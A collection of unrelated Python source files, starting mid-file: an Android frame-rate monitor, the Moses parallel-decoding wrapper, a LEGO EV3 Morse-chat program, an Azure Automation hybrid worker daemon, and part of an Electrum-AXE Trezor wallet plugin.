if not results[0].isdigit():
return (None, None)
try:
refresh_period = int(results[0]) / nanoseconds_per_second
except Exception as e:
logger.exception(e)
return (None, None)
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = [int(fields[0]),int(fields[1]),int(fields[2])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _get_surface_stats_legacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
cur_surface = None
timestamp = datetime.datetime.now()
# 这个命令可能需要root
ret = self.device.adb.run_shell_cmd("service call SurfaceFlinger 1013")
if not ret :
return None
match = re.search('^Result: Parcel\((\w+)', ret)
if match :
cur_surface = int(match.group(1), 16)
return {'page_flip_count': cur_surface,'timestamp': timestamp}
return None
class FPSMonitor(Monitor):
'''FPS监控器'''
def __init__(self, device_id, package_name = None,frequency=1.0,timeout =24 * 60 * 60,fps_queue=None,jank_threshold=166, use_legacy = False):
'''构造器
:param str device_id: 设备id
:param float frequency: 帧率统计频率,默认1秒
:param int jank_threshold: 计算jank值的阈值,单位毫秒,默认10个时钟周期,166ms
:param bool use_legacy: 当指定该参数为True时总是使用page_flip统计帧率,此时反映的是全屏内容的刷新帧率。
当不指定该参数时,对4.1以上的系统将统计当前获得焦点的Activity的刷新帧率
'''
self.use_legacy = use_legacy
self.frequency = frequency # 取样频率
self.jank_threshold = jank_threshold
self.device = AndroidDevice(device_id)
self.timeout = timeout
if not package_name:
package_name = self.device.adb.get_foreground_process()
self.package = package_name
self.fpscollector = SurfaceStatsCollector(self.device, self.frequency, package_name,fps_queue,self.jank_threshold, self.use_legacy)
def start(self,start_time):
'''启动FPSMonitor日志监控器
'''
if not RuntimeData.package_save_path:
RuntimeData.package_save_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), "../..")),'results', self.package, start_time)
if not os.path.exists(RuntimeData.package_save_path):
os.makedirs(RuntimeData.package_save_path)
self.start_time = start_time
self.fpscollector.start(start_time)
logger.debug('FPS monitor has start!')
def stop(self):
'''结束FPSMonitor日志监控器
'''
self.fpscollector.stop()
logger.debug('FPS monitor has stop!')
def save(self):
pass
def parse(self, file_path):
'''解析
:param str file_path: 要解析数据文件的路径
'''
pass
def get_fps_collector(self):
'''获得fps收集器,收集器里保存着time fps jank的列表
:return: fps收集器
:rtype: SurfaceStatsCollector
'''
return self.fpscollector
if __name__ == '__main__':
# tulanduo android8.0 api level 27
monitor = FPSMonitor('TC79SSDMO7HEY5Z9',"com.alibaba.ailabs.genie.smartapp",1)
# mate 9 android8.0
# monitor = FPSMonitor('MKJNW18226007860',"com.sankuai.meituan",2)
# android8.0 Google Pixel 2
# monitor = FPSMonitor('HT7B81A05143',package_name = "com.alibaba.ailibs.genie.contacts",1)
monitor.start(TimeUtils.getCurrentTimeUnderline())
time.sleep(600)
monitor.stop()
|
multi_moses.py
|
#!/usr/bin/env python
# Written by Michael Denkowski
#
# This file is part of moses. Its use is licensed under the GNU Lesser General
# Public License version 2.1 or, at your option, any later version.
'''Parallelize decoding with multiple instances of moses on a local machine
To use with mert-moses.pl, activate --multi-moses and set the number of moses
instances and threads per instance with --decoder-flags='--threads P:T:E'
This script runs a specified number of moses instances, each using one or more
threads. The highest speed is generally seen with many single-threaded
instances while the lowest memory usage is seen with a single many-threaded
instance. It is recommended to use the maximum number of instances that will
fit into memory (up to the number of available CPUs) and distribute CPUs across
them equally. For example, a machine with 32 CPUs that can fit 3 copies of
moses into memory would use --threads 2:11:10 for 2 instances with 11 threads
each and an extra instance with 10 threads (3 instances total using all CPUs).
Memory mapped models can be shared by multiple processes and increase the number
of instances that can fit into memory:
Mmaped phrase tables (Ulrich Germann)
http://www.statmt.org/moses/?n=Advanced.Incremental#ntoc3
Mmaped mapped language models (Kenneth Heafield)
http://www.statmt.org/moses/?n=FactoredTraining.BuildingLanguageModel#ntoc19
'''
import collections
import os
import Queue
import signal
import subprocess
import sys
import threading
HELP = '''Multiple process decoding with Moses
Usage:
{} moses --config moses.ini [options] [decoder flags]
Options:
--threads P:T:E
P: Number of parallel instances to run
T: Number of threads per instance
E: Number of threads in optional extra instance
(default 1:1:0, overrides [threads] in moses.ini. Specifying T
and E is optional, e.g. --threads 16 starts 16 single-threaded
instances)
--n-best-list nbest.out N [distinct]: location and size of N-best list
--show-weights: for mert-moses.pl, just call moses and exit
Other options (decoder flags) are passed through to moses instances
'''
# Defaults
INPUT = sys.stdin
PROCS = 1
THREADS = 1
EXTRA = 0
DONE = threading.Event()
PID = os.getpid()
# A very long time, used as Queue operation timeout even though we don't
# actually want a timeout but we do want interruptibility
# (https://bugs.python.org/issue1360)
NEVER = 60 * 60 * 24 * 365 * 1000
# Single unit of computation: decode a line, output result, signal done
Task = collections.namedtuple('Task', ['id', 'line', 'out', 'event'])
def kill_main(msg):
'''kill -9 the main thread to stop everything immediately'''
sys.stderr.write('{}\n'.format(msg))
os.kill(PID, signal.SIGKILL)
def gzopen(f):
'''Open plain or gzipped text'''
return gzip.open(f, 'rb') if f.endswith('.gz') else open(f, 'r')
def run_instance(cmd_base, threads, tasks, n_best=False):
'''Run an instance of moses that processes tasks (input lines) from a
queue using a specified number of threads'''
cmd = cmd_base[:]
cmd.append('--threads')
cmd.append(str(threads))
try:
# Queue of tasks instance is currently working on, limited to the number
# of threads * 2 (minimal buffering). The queue should be kept full for
# optimal CPU usage.
work = Queue.Queue(maxsize=(threads * 2))
# Multi-threaded instance
moses = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Read and handle instance output as available
def handle_output():
while True:
# Output line triggers task completion
line = moses.stdout.readline()
# End of output (instance finished)
if not line:
break
task = work.get(timeout=NEVER)
if n_best:
# Read and copy lines until sentinel line, copy real line id
# id ||| hypothesis words ||| feature scores ||| total score
(first_i, rest) = line.split(' ||| ', 1)
task.out.append(' ||| '.join((task.id, rest)))
while True:
line = moses.stdout.readline()
(i, rest) = line.split(' ||| ', 1)
# Sentinel
if i != first_i:
break
task.out.append(' ||| '.join((task.id, rest)))
else:
task.out.append(line)
# Signal task done
task.event.set()
# Output thread
handler = threading.Thread(target=handle_output, args=())
# Daemon: guaranteed to finish before non-daemons
handler.setDaemon(True)
handler.start()
# Input thread: take tasks as they are available and add them to work
# queue. Stop when DONE encountered.
while True:
task = tasks.get(timeout=NEVER)
work.put(task, timeout=NEVER)
if task.event == DONE:
break
if n_best:
# Input line followed by blank line (sentinel)
moses.stdin.write(task.line)
moses.stdin.write('\n')
else:
moses.stdin.write(task.line)
# Cleanup
moses.stdin.close()
moses.wait()
handler.join()
except:
kill_main('Error with moses instance: see stderr')
def write_results(results, n_best=False, n_best_out=None):
'''Write out results (output lines) from a queue as they are populated'''
while True:
task = results.get(timeout=NEVER)
if task.event == DONE:
break
task.event.wait()
if n_best:
# Write top-best and N-best
# id ||| hypothesis words ||| feature scores ||| total score
top_best = task.out[0].split(' ||| ', 2)[1]
# Except don't write top-best if writing N-best to stdout "-"
if n_best_out != sys.stdout:
sys.stdout.write('{}\n'.format(top_best))
sys.stdout.flush()
for line in task.out:
n_best_out.write(line)
n_best_out.flush()
else:
sys.stdout.write(task.out[0])
sys.stdout.flush()
def main(argv):
# Defaults
moses_ini = None
input = INPUT
procs = PROCS
threads = THREADS
extra = EXTRA
n_best = False
n_best_file = None
n_best_size = None
n_best_distinct = False
n_best_out = None
show_weights = False
# Decoder command
cmd = argv[1:]
# Parse special options and remove from cmd
i = 1
while i < len(cmd):
if cmd[i] in ('-f', '-config', '--config'):
moses_ini = cmd[i + 1]
# Do not remove from cmd
i += 2
elif cmd[i] in ('-i', '-input-file', '--input-file'):
input = gzopen(cmd[i + 1])
cmd = cmd[:i] + cmd[i + 2:]
elif cmd[i] in ('-th', '-threads', '--threads'):
# P:T:E
args = cmd[i + 1].split(':')
procs = int(args[0])
if len(args) > 1:
threads = int(args[1])
if len(args) > 2:
extra = int(args[2])
cmd = cmd[:i] + cmd[i + 2:]
elif cmd[i] in ('-n-best-list', '--n-best-list'):
n_best = True
n_best_file = cmd[i + 1]
n_best_size = cmd[i + 2]
# Optional "distinct"
if i + 3 < len(cmd) and cmd[i + 3] == 'distinct':
n_best_distinct = True
cmd = cmd[:i] + cmd[i + 4:]
else:
cmd = cmd[:i] + cmd[i + 3:]
# Handled specially for mert-moses.pl
elif cmd[i] in ('-show-weights', '--show-weights'):
show_weights = True
# Do not remove from cmd
i += 1
else:
i += 1
# If mert-moses.pl passes -show-weights, just call moses
if show_weights:
sys.stdout.write(subprocess.check_output(cmd))
sys.stdout.flush()
return
# Check inputs
if not (len(cmd) > 0 and moses_ini):
sys.stderr.write(HELP.format(os.path.basename(argv[0])))
sys.exit(2)
if not (os.path.isfile(cmd[0]) and os.access(cmd[0], os.X_OK)):
raise Exception('moses "{}" is not executable\n'.format(cmd[0]))
# Report settings
sys.stderr.write('Moses flags: {}\n'.format(' '.join('\'{}\''.format(s) if ' ' in s else s for s in cmd[1:])))
sys.stderr.write('Instances: {}\n'.format(procs))
sys.stderr.write('Threads per: {}\n'.format(threads))
if extra:
sys.stderr.write('Extra: {}\n'.format(extra))
if n_best:
sys.stderr.write('N-best list: {} ({}{})\n'.format(n_best_file, n_best_size, ', distinct' if n_best_distinct else ''))
# Task and result queues (buffer 8 * total threads input lines)
tasks = Queue.Queue(maxsize=(8 * ((procs * threads) + extra)))
results = Queue.Queue()
# N-best capture
if n_best:
cmd.append('--n-best-list')
cmd.append('-')
cmd.append(n_best_size)
if n_best_distinct:
cmd.append('distinct')
if n_best_file == '-':
n_best_out = sys.stdout
else:
n_best_out = open(n_best_file, 'w')
# Start instances
instances = []
for i in range(procs + (1 if extra else 0)):
t = threading.Thread(target=run_instance, args=(cmd, (threads if i < procs else extra), tasks, n_best))
instances.append(t)
# Daemon: guaranteed to finish before non-daemons
t.setDaemon(True)
t.start()
# Start results writer
writer = threading.Thread(target=write_results, args=(results, n_best, n_best_out))
writer.start()
# Main loop: queue task for each input line
id = 0
while True:
line = input.readline()
if not line:
break
# (input, out lines, err lines, "done" event)
task = Task(str(id), line, [], threading.Event())
results.put(task, timeout=NEVER)
tasks.put(task, timeout=NEVER)
id += 1
# Tell instances to exit
for t in instances:
tasks.put(Task(None, None, None, DONE), timeout=NEVER)
for t in instances:
t.join()
# Stop results writer
results.put(Task(None, None, None, DONE), timeout=NEVER)
writer.join()
# Cleanup
if n_best:
n_best_out.close()
if __name__ == '__main__':
try:
main(sys.argv)
except:
kill_main('Error with main I/O: see stderr')
|
bttrc_ev3.py
|
#!/usr/bin/env python3
#
# Back To The Roots Communication
#
# 2020 - Rafael Urben | Matthew Haldimann
#
from bttrc import Chat, Morse, Printer
from multiprocessing import Process
import time
def processQueue():
Printer.processQueue()
def morse2chat():
while True:
Chat.send(Morse.enterText())
def chat2print():
while True:
txt = Chat.receive()
if not "//NOPRINT//" in txt:
Printer.addToQueue(txt.rstrip())
Printer.addToQueue(" ")
Chat.send("[BTTRC] - Nachricht erhalten!", nosound=True)
if __name__ == "__main__":
from ev3dev2.button import Button
from ev3dev2.led import Leds
l = Leds()
b = Button()
l.all_off()
l.set_color("LEFT", "RED")
l.set_color("RIGHT", "RED")
print("[BTTRC] - Starten...")
printprocess = Process(target=processQueue)
printprocess.start()
chat2printprocess = Process(target=chat2print)
chat2printprocess.start()
morse2chatprocess = Process(target=morse2chat)
morse2chatprocess.start()
Chat.send("[BTTRC] - Gestartet!", nosound=True)
print("[BTTRC] - Gestartet!")
b.wait_for_bump("left")
print("[BTTRC] - Beenden...")
printprocess.terminate()
chat2printprocess.terminate()
morse2chatprocess.terminate()
Chat.send("[BTTRC] - Beendet!", nosound=True)
print("[BTTRC] - Beendet!")
l.all_off()
|
hybridworker.py
|
#!/usr/bin/env python3
# ====================================
# Copyright (c) Microsoft Corporation. All rights reserved.
# ====================================
import configparser
import os
import platform
import shutil
import subprocess
import sys
import threading
import time
import traceback
# import worker module after linuxutil.daemonize() call
sandboxes_root_folder_name = "sandboxes"
def safe_loop(func):
def decorated_func(*args, **kwargs):
while True:
try:
# ensure required file / cert exists
func(*args, **kwargs)
except (JrdsAuthorizationException,
InvalidFilePermissionException,
FileNotFoundException,
SystemExit):
tracer.log_worker_safe_loop_terminal_exception(traceback.format_exc())
time.sleep(1) # allow the trace to make it to stdout (since traces are background threads)
sys.exit(-1)
except Exception:
tracer.log_worker_safe_loop_non_terminal_exception(traceback.format_exc())
time.sleep(configuration.get_jrds_get_sandbox_actions_polling_freq())
return decorated_func
def background_thread(func):
def decorated_func(*args, **kwargs):
t = threading.Thread(target=func, args=args)
t.daemon = True
t.start()
return decorated_func
def exit_on_error(message, exit_code=1):
crash_log_filename = "automation_worker_crash.log"
util.exit_on_error(filename=crash_log_filename, message=message, exit_code=exit_code)
def test_file_creation(path):
try:
iohelper.write_to_file(path, path)
os.remove(path)
return True
except IOError:
return False
def validate_and_setup_path():
# default to user dir for exception logs to be writen to disk
test_file_name = "test_file"
# test certificate and key path
if not os.path.isfile(configuration.get_jrds_cert_path()) or not os.path.isfile(configuration.get_jrds_key_path()):
exit_on_error("Invalid certificate of key file path (absolute path is required).")
# test working directory for existence and permissions
working_directory_path = configuration.get_working_directory_path()
if not os.path.exists(working_directory_path):
exit_on_error("Invalid working directory path (absolute path is required).")
file_creation = test_file_creation(os.path.join(working_directory_path, test_file_name))
if file_creation is False:
exit_on_error("Invalid working directory permission (read/write permissions are required).")
# test state file path
if configuration.get_state_directory_path() != configuration.DEFAULT_STATE_DIRECTORY_PATH:
if not os.path.exists(configuration.get_state_directory_path()):
exit_on_error("Invalid state directory path (absolute path is required).")
file_creation = test_file_creation(os.path.join(configuration.get_state_directory_path(), test_file_name))
if file_creation is False:
exit_on_error("Invalid state directory permission (read/write permissions are required).")
# OMS integration
# set the working directory owner to be nxautomation:omiusers
if os.name.lower() != "nt":
import pwd
try:
nxautomation_uid = int(pwd.getpwnam('nxautomation').pw_uid)
if os.getuid() == nxautomation_uid:
retval = subprocess.call(["sudo", "chown", "-R", "nxautomation:omiusers", working_directory_path])
if retval != 0:
exit_on_error("Could not change owner of working directory %s to nxautomation:omiusers"
% (working_directory_path))
except KeyError:
# nxautomation user was not found on the system, skip this step
tracer.log_debug_trace("Ownership change of working directory skipped. nxautomation user not found.")
pass
def generate_state_file():
# skip state file if the worker is managed by the worker manager
if len(sys.argv) >= 3 and str(sys.argv[2]) == "managed":
return
state_file_name = "state.conf"
if configuration.get_state_directory_path() == configuration.DEFAULT_STATE_DIRECTORY_PATH:
state_file_path = os.path.join(configuration.get_working_directory_path(), state_file_name)
else:
state_file_path = os.path.join(configuration.get_state_directory_path(), state_file_name)
tracer.log_debug_trace("State file path : " + str(state_file_path))
if os.path.isfile(state_file_path):
os.remove(state_file_path)
section = "state"
conf_file = open(state_file_path, 'w')
config = configparser.ConfigParser()
config.add_section(section)
config.set(section, configuration.STATE_PID, str(os.getpid()))
config.set(section, configuration.WORKER_VERSION, str(configuration.get_worker_version()))
# for OMS scenarios, optional for DIY
if len(sys.argv) >= 3:
config.set(section, configuration.STATE_WORKSPACE_ID, str(sys.argv[2]))
if len(sys.argv) >= 4:
config.set(section, configuration.STATE_RESOURCE_VERSION, str(sys.argv[3]))
config.write(conf_file)
conf_file.close()
# OMS integration
# set the ownership of the state file to nxautomation:omiusers
# set the permission of the state file to 660
if os.name.lower() != "nt":
import pwd
try:
nxautomation_uid = int(pwd.getpwnam('nxautomation').pw_uid)
if os.getuid() == nxautomation_uid:
retval = subprocess.call(["sudo", "chown", "nxautomation:omiusers", state_file_path])
if retval != 0:
exit_on_error(
"Could not change owner of state file %s to nxautomation:omiusers" % (state_file_path))
retval = subprocess.call(["sudo", "chmod", "660", state_file_path])
if retval != 0:
exit_on_error("Could not change permission of state file %s " % (state_file_path))
except KeyError:
# nxautomation user was not found on the system, skip this step
tracer.log_debug_trace("State file permission change skipped. nxautomation user not found.")
pass
class Worker(object):
def __init__(self):
tracer.log_worker_starting(configuration.get_worker_version())
http_client_factory = HttpClientFactory(configuration.get_jrds_cert_path(), configuration.get_jrds_key_path(),
configuration.get_verify_certificates())
http_client = http_client_factory.create_http_client(sys.version_info)
self.jrds_client = JRDSClient(http_client)
self.running_sandboxes = {}
@staticmethod
def assert_environment_prerequisite():
jrds_cert_path = configuration.get_jrds_cert_path()
if util.assert_file_read_permission(jrds_cert_path) is False:
raise InvalidFilePermissionException(jrds_cert_path)
jrds_key_path = configuration.get_jrds_key_path()
if util.assert_file_read_permission(jrds_key_path) is False:
raise InvalidFilePermissionException(jrds_key_path)
worker_conf_path = configuration.get_worker_configuration_file_path()
if util.assert_file_read_permission(worker_conf_path) is False:
raise InvalidFilePermissionException(worker_conf_path)
proxy_conf_path = configuration.get_proxy_configuration_path()
if proxy_conf_path != configuration.DEFAULT_PROXY_CONFIGURATION_PATH and os.path.isfile(proxy_conf_path):
if util.assert_file_read_permission(proxy_conf_path) is False:
raise InvalidFilePermissionException(proxy_conf_path)
@staticmethod
def construct_jrds_msi_endpoint(sandbox_id):
url = configuration.get_jrds_base_uri() + "/automationAccounts/" + configuration.get_account_id() + \
"/Sandboxes/" + sandbox_id + "/metadata/identity/oauth2/token"
return url
@safe_loop
def routine(self):
self.assert_environment_prerequisite()
self.stop_tracking_terminated_sandbox()
sandbox_actions = self.jrds_client.get_sandbox_actions()
if sandbox_actions is None:
tracer.log_get_sandbox_action_returned_null_data()
return
tracer.log_debug_trace("Get sandbox action. Found " + str(len(sandbox_actions)) + " action(s).")
for action in sandbox_actions:
tracer.log_worker_sandbox_action_found(len(sandbox_actions))
sandbox_id = str(action["SandboxId"])
# prevent duplicate sandbox from running
if sandbox_id in self.running_sandboxes:
continue
# create sandboxes folder if needed
sandbox_working_dir = os.path.join(configuration.get_working_directory_path(), sandboxes_root_folder_name,
sandbox_id)
try:
iohelper.assert_or_create_path(sandbox_working_dir)
except OSError as exception:
tracer.log_worker_failed_to_create_sandbox_root_folder(sandbox_id, exception)
raise SystemExit("Sandbox folder creation failed.")
# copy current process env variable (contains configuration) and add the sanbox_id key
process_env_variables = os.environ.copy()
process_env_variables["sandbox_id"] = sandbox_id
msi_secret = str(action["MSISecret"])
if (msi_secret and msi_secret != "None"):
process_env_variables["MSI_SECRET"] = msi_secret
process_env_variables["MSI_ENDPOINT"] = self.construct_jrds_msi_endpoint(sandbox_id)
python_to_be_used = util.get_python_to_be_used()
print("Using %s" %(python_to_be_used))
cmd = [python_to_be_used, os.path.join(configuration.get_source_directory_path(), "sandbox.py"),
configuration.get_worker_configuration_file_path()]
tracer.log_worker_starting_sandbox(sandbox_id)
sandbox_process = subprocessfactory.create_subprocess(cmd=cmd,
env=process_env_variables,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=sandbox_working_dir)
self.running_sandboxes[sandbox_id] = sandbox_process
tracer.log_worker_started_tracking_sandbox(sandbox_id)
self.monitor_sandbox_process_outputs(sandbox_id, sandbox_process)
tracer.log_worker_sandbox_process_started(sandbox_id, str(sandbox_process.pid))
@background_thread
def monitor_sandbox_process_outputs(self, sandbox_id, process):
while process.poll() is None:
output = process.stdout.readline().decode().replace("\n", "")
if output == '':
continue
if output != '':
tracer.log_sandbox_stdout(output)
if process.poll() != 0:
full_error_output = ""
while True:
error_output = process.stderr.readline().decode()
if error_output is None or error_output == '':
break
full_error_output += error_output
tracer.log_worker_sandbox_process_crashed(sandbox_id, process.pid, process.poll(), full_error_output)
tracer.log_worker_sandbox_process_exited(sandbox_id, str(process.pid), process.poll())
# cleanup sandbox directory
sandbox_working_dir = os.path.join(configuration.get_working_directory_path(), sandboxes_root_folder_name,
sandbox_id)
shutil.rmtree(sandbox_working_dir, ignore_errors=True)
@background_thread
def telemetry_routine(self):
while True:
tracer.log_worker_general_telemetry(configuration.get_worker_version(), configuration.get_worker_type(),
linuxutil.get_current_username(), linuxutil.get_oms_agent_id())
tracer.log_worker_python_telemetry(platform.python_version(), platform.python_build(),
platform.python_compiler())
tracer.log_worker_system_telemetry(platform.system(), platform.node(), platform.version(),
platform.machine(), platform.processor())
try:
distributor_id, description, release, codename = linuxutil.get_lsb_release()
tracer.log_worker_lsb_release_telemetry(distributor_id, description, release, codename)
except:
pass
# sleep for 6 hours, this allows us to gather daily telemetry
time.sleep(60 * 60 * 6)
def stop_tracking_terminated_sandbox(self):
terminated_sandbox_ids = []
# detect terminated sandboxes
for sandbox_id, sandbox_process in list(self.running_sandboxes.items()):
if sandbox_process.poll() is not None:
terminated_sandbox_ids.append(sandbox_id)
# clean-up terminated sandboxes
for sandbox_id in terminated_sandbox_ids:
removal = self.running_sandboxes.pop(sandbox_id, None)
if removal is not None:
tracer.log_worker_stopped_tracking_sandbox(sandbox_id)
def main():
if len(sys.argv) < 2:
exit_on_error("Missing configuration file path.")
configuration_path = str(sys.argv[1])
if not os.path.isfile(configuration_path):
exit_on_error("Invalid configuration file path or empty configuration file (absolute path is required).")
# configuration has to be read first thing
try:
# remove the test_mode env_var value (mainly for Windows)
# this value is set in test
del os.environ["test_mode"]
except KeyError:
pass
configuration.read_and_set_configuration(configuration_path)
configuration.set_config({configuration.COMPONENT: "worker"})
validate_and_setup_path()
# do not trace anything before this point
generate_state_file()
worker = Worker()
worker.telemetry_routine()
worker.routine()
if __name__ == "__main__":
try:
import configuration3 as configuration
import iohelper
import subprocessfactory
import tracer
from httpclientfactory import HttpClientFactory
from jrdsclient import JRDSClient
from workerexception import *
import util
main()
except:
exit_on_error(traceback.format_exc())
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_axe.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_axe.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_axe import constants
from electrum_axe.i18n import _
from electrum_axe.plugin import BasePlugin, Device
from electrum_axe.transaction import deserialize, Transaction
from electrum_axe.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_axe.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "AXE Testnet" if constants.net.TESTNET else "AXE"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
